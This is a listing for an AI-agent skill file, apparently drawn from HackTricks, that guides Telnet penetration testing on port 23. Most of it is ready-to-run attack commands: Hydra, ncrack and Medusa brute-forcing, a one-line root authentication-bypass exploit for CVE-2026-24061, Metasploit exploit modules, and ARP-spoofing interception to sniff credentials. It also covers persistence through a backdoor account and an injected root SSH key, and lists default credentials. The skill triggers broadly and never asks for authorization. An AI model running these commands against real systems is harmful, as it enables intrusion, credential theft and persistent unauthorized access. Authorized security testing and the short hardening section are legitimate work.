OpenSkillIndex← back to search

Hacktricks-skills telnet-pentesting

Pentest Telnet services (port 23) - use this skill whenever the user mentions Telnet, port 23, network service enumeration, credential brute-forcing, or vulnerability assessment of Telnet daemons. This skill covers banner grabbing, option enumeration, brute-force attacks, CVE exploitation (including CVE-2026-24061 auth bypass), credential sniffing, and hardening recommendations.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-telnet/SKILL.MD
source content

Telnet Pentesting Skill

A comprehensive guide for assessing Telnet services during penetration testing engagements.

When to Use This Skill

Use this skill when:

  • You need to enumerate or exploit a Telnet service (port 23)
  • The user mentions Telnet, port 23, or network service testing
  • You're performing vulnerability assessment on legacy systems
  • You need to brute-force Telnet credentials
  • You're investigating CVE-2026-24061 or other Telnet vulnerabilities
  • You need to capture Telnet credentials in transit
  • You're hardening a system against Telnet attacks

Quick Reference

TaskCommand
Banner grab
nc -vn <IP> 23
Nmap enumeration
nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>
Brute force (Hydra)
hydra -L users.txt -P rockyou.txt -t 4 -f telnet://<IP>
CVE-2026-24061 exploit
USER='-f root' telnet -a <ip>
Credential sniffing
sudo tcpdump -i eth0 -A 'tcp port 23'

Enumeration Workflow

Step 1: Initial Reconnaissance

Start with basic banner grabbing to identify the Telnet daemon:

# Simple banner grab
nc -vn <IP> 23

# Or use telnet directly
telnet <IP> 23

Look for:

  • Service version strings
  • OS identification
  • Login prompts
  • Error messages that reveal implementation details

Step 2: Nmap Script Scanning

Run comprehensive Nmap scripts to enumerate Telnet options and vulnerabilities:

# Full Telnet enumeration (safe scripts only)
nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>

# Check for encryption option support
nmap -p 23 --script telnet-encryption <IP>

# Extract NTLM info (Windows/Microsoft Telnet)
nmap -p 23 --script telnet-ntlm-info <IP>

# Brute-force via NSE (alternative to Hydra)
nmap -p 23 --script telnet-brute --script-args userdb=users.txt,passdb=pass.txt <IP>

What these scripts do:

  • telnet-encryption
    : Checks if ENCRYPT option is supported (some implementations had vulnerabilities)
  • telnet-ntlm-info
    : Discloses NetBIOS/DNS/OS build info when Microsoft Telnet NTLM is enabled
  • telnet-brute
    : NSE-based brute-force auditor

Step 3: Metasploit Enumeration

Use Metasploit auxiliary modules for deeper enumeration:

# Version detection
msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS <IP>; set RPORT 23; run; exit'

# Check for Brocade enable login vulnerability
msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS <IP>; set RPORT 23; run; exit'

# Test for encrypt overflow (Solaris 9/10)
msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS <IP>; set RPORT 23; run; exit'

# Check for RuggedCom vulnerability
msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS <IP>; set RPORT 23; run; exit'

Brute-Force Attacks

Hydra (Recommended)

# Basic brute-force with user/password lists
hydra -L users.txt -P rockyou.txt -t 4 -f telnet://<IP>

# Single user with multiple passwords
hydra -l admin -P rockyou.txt -t 4 -f telnet://<IP>

# With specific login format (if known)
hydra -L users.txt -P passwords.txt -t 4 -f -l "login:" telnet://<IP>

Hydra flags:

  • -L
    : Load usernames from file
  • -P
    : Load passwords from file
  • -t
    : Number of parallel tasks
  • -f
    : Exit after first valid login found
  • -V
    : Verbose output

Ncrack

# Brute-force with ncrack (drops to interactive session on success)
ncrack -p 23 --user admin -P common-pass.txt --connection-limit 4 <IP>

# With user list
ncrack -p 23 -U users.txt -P passwords.txt <IP>

Medusa

# Parallel brute-force across multiple hosts
medusa -M telnet -h targets.txt -U users.txt -P passwords.txt -t 6 -f

# Single host with verbose output
medusa -h <IP> -M telnet -u admin -P rockyou.txt -t 4 -f -v

Vulnerability Exploitation

CVE-2026-24061 - GNU Inetutils telnetd Auth Bypass (CRITICAL)

Affected versions: inetutils 1.9.3–2.7 (before 2.7-2)

Vulnerability: The 

telnetd
daemon substitutes 
%U
in its login template with 
getenv("USER")
without filtering, allowing argv-level option injection.

Exploit:

# Inject USER via NEW_ENVIRON and obtain root shell
USER='-f root' telnet -a <ip>

How it works:

  1. Telnet negotiates NEW_ENVIRON option to set 
    USER=-f root
  2. telnetd
    builds login argv: 
    /usr/bin/login -h <hostname> "-f root"
  3. login -f root
    spawns a root shell without authentication

Detection:

# Check telnetd version
telnetd --version

# Check installed package
dpkg -l | grep inetutils

# Check if service is running
systemctl status inetutils-telnetd
netstat -tlnp | grep :23

Patch: Upgrade to inetutils 2.7-2 or later (Debian: 2:2.4-2+deb12u2, 2:2.6-3+deb13u1, 2:2.7-2)

CVE-2024-45698 - D-Link DIR-X4860 RCE

Affected: D-Link Wi-Fi 6 routers (DIR-X4860) with firmware before 1.04B05

Vulnerability: Improper input validation allows remote attackers to log in using hard-coded credentials and inject OS commands.

Mitigation: Update to firmware 1.04B05 or later.

CVE-2023-40478 - NETGEAR RAX30 Buffer Overflow

Affected: NETGEAR RAX30 routers

Vulnerability: Stack-based buffer overflow in Telnet CLI 

passwd
command enables code execution as root.

Note: Authentication is required but can often be bypassed with default credentials.

CVE-2022-39028 - GNU inetutils telnetd DoS

Affected: GNU inetutils telnetd

Vulnerability: Two-byte sequence (

0xff 0xf7
/ 
0xff 0xf8
) triggers NULL-pointer dereference, causing service crash.

Impact: Repeated crashes can cause inetd to disable the service (DoS).

NETGEAR Telnet Enable Exploit

Many NETGEAR routers have a hidden telnet enable feature:

# Metasploit module
msfconsole -q -x 'use exploit/linux/mips/netgear_telnetenable; set RHOSTS <IP>; run; exit'

Credential Sniffing

Telnet transmits all data, including credentials, in clear-text. Capture them with:

tcpdump

# Live capture with ASCII output
sudo tcpdump -i eth0 -A 'tcp port 23 and not src host $(hostname -I | cut -d" " -f1)'

# Save to file for later analysis
sudo tcpdump -i eth0 -w telnet_capture.pcap 'tcp port 23'

Wireshark

Display filter:

tcp.port == 23 && (telnet.data || telnet.option)

MITM Setup

For active MITM on switched networks:

# ARP spoofing with arpspoof
arpspoof -i eth0 -t <target> <gateway>

# Or use ettercap
ettercap -T -q -i eth0 -M arp:remote /<target>/ /<gateway>/

# Then sniff with tcpdump as above

Post-Exploitation

TTY Upgrade

After obtaining a shell, upgrade to a proper TTY:

# Python method
python -c 'import pty;pty.spawn("/bin/bash")'

# Python 3
python3 -c 'import pty;pty.spawn("/bin/bash")'

# Perl method
perl -e 'exec "/bin/bash -i";'

# Then in the new shell:
stty -a  # Check TTY settings
script -q /dev/null  # Alternative TTY upgrade

Persistence

Once you have access:

  1. Add user account:

    useradd -m -s /bin/bash backdoor
echo 'backdoor:password' | chpasswd

  2. SSH key:

    mkdir -p /root/.ssh
echo 'ssh-rsa AAAA...' >> /root/.ssh/authorized_keys
chmod 700 /root/.ssh
chmod 600 /root/.ssh/authorized_keys

  3. Check for other services:

    netstat -tlnp
ps aux
cat /etc/passwd

Hardening Recommendations (Blue Team)

Immediate Actions

  1. Disable Telnet completely - Prefer SSH for all remote access
  2. If Telnet is required:
    • Bind to management VLANs only
    • Enforce strict ACLs
    • Wrap with TCP wrappers (
      /etc/hosts.allow
      , 
      /etc/hosts.deny
      )

Configuration Files to Check

/etc/inetd.conf
/etc/xinetd.d/telnet
/etc/xinetd.d/stelnet

Enhanced Security

  1. Replace with encrypted alternatives:

    • Use 
      ssl-telnet
      or 
      telnetd-ssl
      for transport encryption
    • Note: This only protects data-in-transit; password-guessing remains trivial

  2. Monitor for abuse:

    # Check for outbound Telnet (potential reverse shells)
netstat -tunap | grep :23

# Monitor authentication failures
grep telnet /var/log/auth.log

  3. Network segmentation:

    • Isolate Telnet services to management networks
    • Block port 23 at perimeter firewalls
    • Implement IDS/IPS rules for Telnet traffic

Common Default Credentials

Many IoT devices use default Telnet credentials. Test these:

VendorUsernamePassword
Genericadminadmin
Genericrootroot
Genericadminpassword
Genericadmin(blank)
Genericroot(blank)
D-Linkadmin(blank)
NETGEARadminpassword
NETGEARadmin(blank)
TP-Linkadminadmin
Ciscociscocisco
Ciscoadminadmin

Quick Command Reference

# Enumeration
nc -vn <IP> 23
nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>
nmap -p 23 --script telnet-ntlm-info <IP>

# Brute-force
hydra -L users.txt -P rockyou.txt -t 4 -f telnet://<IP>
ncrack -p 23 -U users.txt -P passwords.txt <IP>
medusa -h <IP> -M telnet -U users.txt -P passwords.txt -t 4 -f

# CVE-2026-24061 exploit
USER='-f root' telnet -a <ip>

# Credential sniffing
sudo tcpdump -i eth0 -A 'tcp port 23'

# Metasploit enumeration
msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS <IP>; run; exit'

References